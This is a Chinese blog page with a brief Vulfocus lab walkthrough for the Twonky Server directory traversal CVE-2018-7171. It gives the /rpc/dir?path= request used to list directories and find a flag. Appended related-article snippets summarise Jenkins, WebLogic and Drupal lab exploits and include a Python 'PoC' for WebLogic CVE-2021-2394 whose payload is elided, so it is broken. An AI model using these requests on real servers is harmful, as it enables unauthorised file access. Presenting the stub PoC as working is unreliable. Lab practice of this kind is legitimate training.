vulfocus——twonkyserver(cve_2018_7171)

最新推荐文章于 2024-07-24 22:46:23 发布
原创 最新推荐文章于 2024-07-24 22:46:23 发布 · 660 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#servlet #jar #java

描述

LYNX Twonky Server是美国LYNX TECHNOLOGY公司的一款媒体服务器,支持在连接的设备之间共享媒体内容。 LYNX Twonky Server 7.0.11版本至8.5版本中存在目录遍历漏洞

远程攻击者可通过向rpc/set_all发送带有‘..’序列的‘contentbase’参数利用该漏洞分享任意目录的内容。 

复现

1.打开靶场

2.payload

/rpc/dir?path=/

3.因为flag在tmp目录下,所有path=010

[漏洞复现]vulfocus/jenkins-cve_2018_1000861-命令执行
qq_45751902的博客
11-24 524
Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。通过这个漏洞,我们可以找到很多可供利用的利用链。
Vulfocus漏洞复现】weblogic-cve_2018_2894
weixin_45632448的博客
04-02 2584
漏洞描述 WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do 影响范围 weblogic 10.3.6.0 weblogic 12.1.3.0 weblogic 12.2.1.2 weblogic 12.2.1.3 漏洞复现 访问靶场 http://123.58.236.76:61812/console/login/LoginForm.jsp 访问漏洞利用点 /ws_utc/confi
sharingIsCaring:TwonkyMedia服务器7.0.11-8.5目录遍历CVE-2018-7171
05-15
分享Ising Caring TwonkyMedia Server Pwnd CVE-2018-7171 背景资料 这是一个GitHub存储库,保留有关CVE-2018-7171的所有相关信息。 (和更多) CVE-2018-7171代表TwonkyMedia Server版本7.0.11-8.5(最新版本)中的目录/文件遍历漏洞。 利用此漏洞,攻击者可以列出独立运行TwonkyMedia Server平台的设备上的所有文件。 此外,攻击者可以利用此漏洞从设备下载所有媒体文件(图片,视频和音乐)。 要利用此漏洞,TwonkyMedia Server一定不能用密码保护(这是默认设置)。 由于数量庞大,大约24,000个TwonkyMedia Server实例很少受到密码保护,因此可以通过Internet到达此范围,因此研究人员决定发布此漏洞。 也许您不知道TwonkyMedia Ser
twonkyserver 目录遍历(CVE-2018-7171)漏洞复现【VULFOCUS靶场-初级】
01-12 4071
LYNX Twonky Server是美国LYNX TECHNOLOGY公司的一款媒体服务器,支持在连接的设备之间共享媒体内容。 LYNX Twonky Server 7.0.11版本至8.5版本中存在目录遍历漏洞。远程攻击者可通过向rpc/set_all发送带有‘..’序列的‘contentbase’参数利用该漏洞分享任意目录的内容。
【漏洞复现-twonkyserver-目录遍历】vulfocus/twonkyserver-cve_2018_7171
10-15 929
twonkyserver-目录遍历】读取文件
VULFOCUS靶场(vulfocus/twonkyserver-cve_2018_7171:latest )
qq_44122254的博客
09-02 668
vulfocus/twonkyserver-cve_2018_7171:latest
twonkyserver 目录遍历(CVE-2018-7171
m0_65150886的博客
01-02 530
LYNX Twonky Server是美国LYNX TECHNOLOGY公司的一款媒体服务器,支持在连接的设备之间共享媒体内容。LYNX Twonky Server 7.0.11版本至8.5版本中存在目录遍历漏洞。远程攻击者可通过向rpc/set_all发送带有‘…’序列的‘contentbase’参数利用该漏洞分享任意目录的内容。2.访问/rpc/dir?1.访问ip:port。
vulfocus——drupal1代码执行(CVE-2018-7600)
m0_62063669的博客
09-07 1184
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。函数会把第一个参数作为回调函数,之后的参数作为回调函数的参数。有特殊的处理,攻击者可利用Drupal表单渲染的问题执行恶意代码,达到完全控制。时就会提示可能导致代码执行。Drupal的问题稍显常规,来自。是用户可控的,这就导致了。
vulfocus】/hms-cve_2022_25491:latest
muyuchen110的博客
07-24 802
具体fllag信息没搞出来...............
Monstra CMS文件上传(vulfocus/monstra_cve_2020_13384的writeup)
sGanYu
05-04 2666
环境:Vulfocus 漏洞威胁分析平台 writeup 开启环境 随意注册一个用户,如果说记性不好的话(bushiwo)可以把账户名密码都设置为admin,邮箱随意 直奔主题 漏洞路径:http://123.58.236.76:48412/admin/ ,如果是和我一样注册的话,这里用户名和密码都是admin 点击上传文件 第一步,上传所需文件,第二步,抓包 注意:程序不允许'html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'p.
Twonky Media
03-12
将在家庭电脑照片、视频、音乐与电视、手机共享的软件。支持DLNA所有功能
caring-fredericton-ui:贴心日历应用程序的响应式网站项目
05-03
思域科技-关怀日历 该项目包含“关怀日历”应用程序的响应式Web应用程序。 该项目使用React框架作为应用程序的基础。 功能性 用户注册 组织管理(注册,验证,更新) 安排活动 项目布局 条目组件是./src/App.js REST API端点集成在./src/api 与Auth相关的组件位于./src/auth 对话框添加到./src/components/dialogs 页面被添加到./src/components/pages 常见样式在./src/styles 形式 使用Formik + Yup进行验证 材料设计 全局主题: ./src/styles/materialAppTheme.js 本地组件样式: ./src/<component>/<component>.materialStyles.js component>/< ./src/<component>/<
twonkyserver 目录遍历 (CVE-2018-7171
qq_23003811的博客
07-19 318
LYNX Twonky Server是美国LYNX TECHNOLOGY公司的一款媒体服务器,支持在连接的设备之间共享媒体内容。远程攻击者可通过向rpc/set_all发送带有‘..’序列的‘contentbase’参数利用该漏洞分享任意目录的内容。2、再访问/rpc/dir?path=010,010对应上一步的路径。LYNX Twonky Server 7.0.11版本至8.5版本。1、访问/rpc/dir?
目录穿越漏洞CVE-2018-7171复现 又学到一招小技巧!!!!
helloKittywz的博客
06-09 449
还是半夜睡不着,打开靶机开始操作。今天看了文件下载和目录穿越漏洞想结合以及防御方法。半夜来进行操作一波。复现一下漏洞开始操作起来!!!进入到页面,开始找细节,然后看了前面的提示操作,我前面也是以为要使用contentbases这个参数来进行访问。没有找到我想要的东西然后加上我前面说的那个参数没有找到的操作????我就在仔细去看,是要使用什么rpc/set_all发送带../序列的那个参数来进行操作的然后我去百度知道了rpc这个是远程过程调用的协议。说简单一点就是可以进行远程访问的操作。
twonky设置好电视服务器诊断找不到,Twonky 服务器 | 流畅多媒体体验 | QNAP
weixin_39603492的博客
07-29 669
安装 QTS 4.3.6 和 4.4.1(或以上版本)TS-131,TS-231,TS-431,TS-431U,TS-231+,TS-431+TS-131P,TS-231P,TS-431P,TS-531P,TS-231P2,TS-431P2,TS-431X,TS-431X2,TS-531X,TS-831X,TS-1635,TS-251D,TS-251C,TS-451S,TS-251,TS-451,...
DLAN 连接和使用体验——Twonky
热门推荐
samfang的专栏
05-23 1万+
DLAN 连接和使用体验——Twonky 松下说明书中讲到目前ST30C只支持与windows7 的DLAN连接,只好下载了windows7 系统,但是因为对windows7不甚了解,担心装机出现问题,故一直没有升级系统,昨天一不小心发现其实ST30C支持与xp系统的DLAN连接: 1 下载Twonkymeida server,google一下都能找到  http://www.on
TwonkyMedia6.0.38
大磊大的专栏
12-29 2218
注册码KXPG-LGPT-DPSX-XPXK-SKMK-CBGS-HXWS-FTST TwonkyMedia的下载地址: Windows XP、Vista、7:http://www.twonky.com/upfiles/TwonkyMediaSetupStandard.exe Mac:http://www.twonky.com/upfiles/TwonkyMediaServer_MO
window OS间通过DLNA播放流媒体
cloudGH的专栏
01-05 975
服务器采用XP,安装DLNA 服务器软件Twonky Server. 客户端使用win7,不需另装软件。使用Windows Media Player,只需设置下其中选项。 服务器端设置,相关文字网络上有很多,此处略去。 重点谈谈客户端设置。 客户端使用如下: 参照上面说明
8.5 注册码
hejias的专栏
02-24 3512
Subscriber:kobe Subscription Code:xLR8ZC-855550-615658598517277 可以使用到2016年!!!
vulfocus/weblogic-cve_2021_2394
最新发布
03-29
### 关于WebLogic CVE-2021-2394漏洞的信息 CVE-2021-2394 是 Oracle WebLogic Server 中的一个反序列化漏洞,允许未经身份验证的攻击者通过 T3 协议发送恶意数据包来实现远程代码执行 (RCE)[^6]。此漏洞的影响范围包括以下版本: - **Oracle WebLogic Server 12.1.3** - **Oracle WebLogic Server 12.2.1.x** #### 漏洞原理 该漏洞源于 WebLogic 的 `wls9_async_response` 组件未能正确处理传入的数据流,在解析过程中存在反序列化的安全隐患。由于未经过充分的身份验证校验,攻击者可以构造特定的 Java 对象并触发 RCE 行为。 --- ### VulFocus 环境搭建指南 VulFocus 提供了一个便捷的方式来快速部署漏洞复现环境。以下是针对 CVE-2021-2394 的具体操作方法: #### 步骤说明 1. 安装 Docker 和 Docker Compose 工具。 如果尚未安装这些工具,请运行以下命令完成安装: ```bash sudo apt-get update && sudo apt-get install -y docker.io docker-compose ``` 2. 下载目标镜像。 使用官方提供的脚本拉取对应漏洞容器: ```bash git clone https://github.com/vulfocus/vulfocus.git cd vulfocus/weblogic-cve-2021-2394/ sudo docker-compose up -d ``` 3. 启动成功后访问服务地址,默认端口通常设置为 `7001` 或其他指定配置项中的值。 > 注意事项:确保主机防火墙已开放必要通信端口,并确认资源充足以支持虚拟机正常启动[^5]。 --- ### Exploit PoC 实施流程 目前公开可用的一种 POC 脚本如下所示,基于 Python 编写而成用于测试目的仅限合法授权范围内使用! ```python import socket from struct import pack def create_exploit_payload(): # 构造payload部分省略实际细节... payload = b"\x00\x00" + ... # 自定义shellcode填充区域 return payload target_ip = "192.168.1.10" port = 7001 try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, port)) header = pack(">I", len(create_exploit_payload())) s.send(header + create_exploit_payload()) except Exception as e: print(f"[!] Error occurred: {e}") finally: s.close() ``` 上述代码片段展示了如何向受影响服务器投递精心设计好的字节码从而达成控制意图[^7]。 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值